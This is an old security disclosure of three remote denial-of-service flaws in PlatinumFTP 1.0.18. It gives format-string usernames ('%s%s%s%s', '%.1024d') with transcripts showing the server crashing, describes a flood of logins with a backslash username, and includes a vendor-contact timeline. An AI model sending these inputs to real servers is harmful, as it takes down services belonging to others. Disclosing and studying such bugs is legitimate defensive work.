portsonline.net

platinumftp 1.0.18 Bugs: Some informations about the Bugs I found in PlatinumFTP 1.0.18.

addition 20050312:

Gary posted some quite interesting news on FD a few minutes after I made this 'Disclosure'. The PlatinumFTP server uses an ActiveX control made by Mabry Software. And in fact it's this ActiveX part which is vulnerable.

Secunia - Mabry FTPServer/X Command Format String Vulnerability

OSVDB - Mabry FTPServer/X Command Username Format String Flaw

addition 20050313:

Bugtraq: PlatinumFTP 1.0.18 remote DoS

Securityfocus: PlatinumFTPServer Multiple Malformed User Name Connection DOS Vulnerability

addition 20050313:

milw0rm: PlatinumFTP <= 1.0.18 Multiple Remote Denial of Service Exploit

Application: PlantinumFTP

Site: http://www.roboshareware.com/indexplatinumftp.php

Version: 1.0.18 and maybe lower

OS: Windows

Bug: Remote Denial of Service

=====

Product:

PlatinumFTPserver simplifies management of all your Ftp clients with regards to sending and receiving program and data files over an IP< connection.

=====

About:

I didn't found any informations about the Bugs I've found and the vendor doesn't seem to be interested in fixing problems (see History). Since PlatinumFTP isn't a mainstream server I decided to make this Disclosure.

Well, I found 3 different ways do shut down (denial of service) a PlatinumFTP 1.0.18 server. At least you doesn't need a valid user.

=====

First Bug:

You can stop the server using %s%s%s%s as username.

Download: pftpdos2.pl

-------------------- schnipp --------------------

ports@boom:~$ ftp 192.168.10.101

Connected to 192.168.10.101.

220-PlatinumFTPserver V1.0.18

220 Enter login details

Name (192.168.10.101:ports): %s%s%s%s

421 Service not available, remote server has closed connection

No control connection for command: Transport endpoint is not connected

ftp>

-------------------- schnapp --------------------

=====

Second Bug:

You can stop the server using %.1024d as username.

Download: pftpdos3.pl

-------------------- schnipp --------------------

ports@boom:~$ ftp 192.168.10.101

Connected to 192.168.10.101.

220-PlatinumFTPserver V1.0.18

220 Enter login details

Name (192.168.10.101:ports): %.1024d

331 Password required for 000000000000000000000000000000000000000000000

00000000000000000000000000000000000000000000000000000000000000000000000

000000000000000000000000000000421 Service not available, remote server has closed connection

No control connection for command: Transport endpoint is not connected

ftp>

-------------------- schnapp --------------------

=====

Third Bug:

Download: pftpdos1.pl

Well, shuting down a server using the third bug is, compared to the first Bugs, really tricky *cough*. If you put in a \ as username the Server will show a requester on his console saying 'Incorrect Format: HKEY_LOCAL_MACHINE\SOFTWARE\PlatinumFTPserver\Configuration\Users\'. The ftp login process for the current session will stop until someone affirmed this message.

I wrote a little perl script to see if it's possible to shut the server down and it's working. You just have to connect a couple of times using the username \ and after a few connections (>50) the server will crash.

Since most of you guys know how to write a script like that I doens't attach it :) Of course you can find them later on my homepage.

=====

History:

2005-03-05: Found the Bugs and mailed the vendor

2005-03-07: Mailed the vendor again using all mailaddresse I found

2005-03-10: Created a yahoo-account *sigh* to make a forum post

2005-03-12: Still no response..